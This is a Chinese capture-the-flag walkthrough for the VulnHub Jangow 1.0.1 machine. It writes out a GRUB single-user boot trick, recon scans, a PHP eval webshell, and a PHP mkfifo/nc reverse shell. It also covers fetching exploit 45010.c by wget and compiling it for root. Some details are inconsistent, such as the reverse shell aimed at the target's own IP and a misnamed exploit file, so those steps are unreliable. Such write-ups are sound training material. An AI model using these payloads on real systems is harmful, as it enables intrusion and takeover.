JANGOW: 1.0.1
下載地址:https://www.vulnhub.com/entry/jangow-101,754/
kali攻擊機IP:192.168.147.178
靶機地址:192.168.147.184
信息收集
- 注:部分導入vmware可能會有配置問題,需要修改網卡信息,重啟dhcp服務。(但是無root權限又無法修改網卡信息,借鑒網友的一種方法)
1.在系統啟動時(長按shift鍵)直到顯示以下界面。
2、enter進入到以下界面。
3、按e進入編輯,進入以下界面。刪除"recovery nomodeset"並在末尾添加"quiet splash rw init=/bin/bash"。
ro/rw表示以只讀(ro)/讀寫(rw)模式掛載根文件系統;
quiet用於設置靜默模式;
splash用於設置啟動時的屏幕輸出;
init用於指定內核掛載根文件系統后運行的第一個用戶空間程序的絕對路徑(也有文章描述為設置內核執行的初始化進程名)。
4、按F10或者Ctrl+x 啟動進入如下界面,輸入passwd修改root密碼。(也可不修改root密碼,直接修改網卡信息,如果未進入以下界面,按完F10或者Ctrl+x 的記得同步按Enter)
5、此時得到root密碼。
(1)修改網卡,重啟dhcp服務。首先執行下列命令獲得網卡信息ifconfig -a 或者 ip addr show。
(2)編輯文件: /etc/network/interfaces
sudo vim /etc/network/interfaces (將網卡信息設置為自己的網卡,重啟電腦即可生效。)
6、前期准備已經結束,開始正式收集信息。
一、話不多說,先掃描同網段服務器。
arp-scan -l #得到靶機地址
nmap -sV -O 192.168.147.184 #獲取服務和版本
檢測到開放21和80端口,我們訪問80端口試試。(如下圖所示,可能是文件泄露漏洞)
點擊site進入下圖,發現圖中About、Projects都可點擊,都是界面上的元素,但是Buscar不同,仔細觀察。
點擊Busar之后我們看url發現可能是個傳參點,嘗試輸入whoami,發現是命令執行傳參點。
二、漏洞利用
嘗試上傳webshell。
echo '<?php eval($_POST["sain"]);' > sain.php
蟻劍連接,在該目錄下發現config.php文件,可以獲取desafio02數據庫的賬號密碼,經測試沒啥用。
在下圖目錄中發現.backup文件,可以獲取jangow01數據庫的賬號密碼
因為網站使用的是php語言,所以寫入一個php反彈shell文件(測試該靶機僅有443端口反彈shell):
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.147.184 443 >/tmp/f');?> #直接在本地寫好,用蟻劍上傳即可,我保存為test.php
kali監聽443端口
nc -lvp 443
此時訪問test.php文件 http://192.168.147.184/site/test.php 即可反彈shell
寫入交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whami 發現當前權限是www-data,嘗試提權。
uname -a 查看系統版本、lsb_release -a查看系統發行版本為Ubuntu 16.04
三、提權
- 1、攻擊機為kali,靶機環境是ubuntu16.04,使用 searchsploit 看看有沒有什么可利用的漏洞。
嘗試利用405010.c 文件,首先find查看文件路徑,可能 會出現權限不夠的問題,但是此時已經是root權限,這是一個bug,輸入下面兩個命令就可再次使用find / -name 命令。
成功執行find命令后,找到45010.c文件路徑,cp命令將其復制到 /var/www/html目錄下,cd進入該目錄,開啟http服務。
開啟服務后去靶機執行下列命令。(如果下載不下來,我是利用蟻劍上傳的45010.c文件)
wget http://192.168.147.178:8000/45010.c #在靶機下載45010.c文件,傳輸文件
進入靶機查看文件45010.c存在
gcc 45010.c 編譯文件,生成a.out文件
運行a.out文件,發現獲取到root權限。
進入 /root目錄,拿到flag。
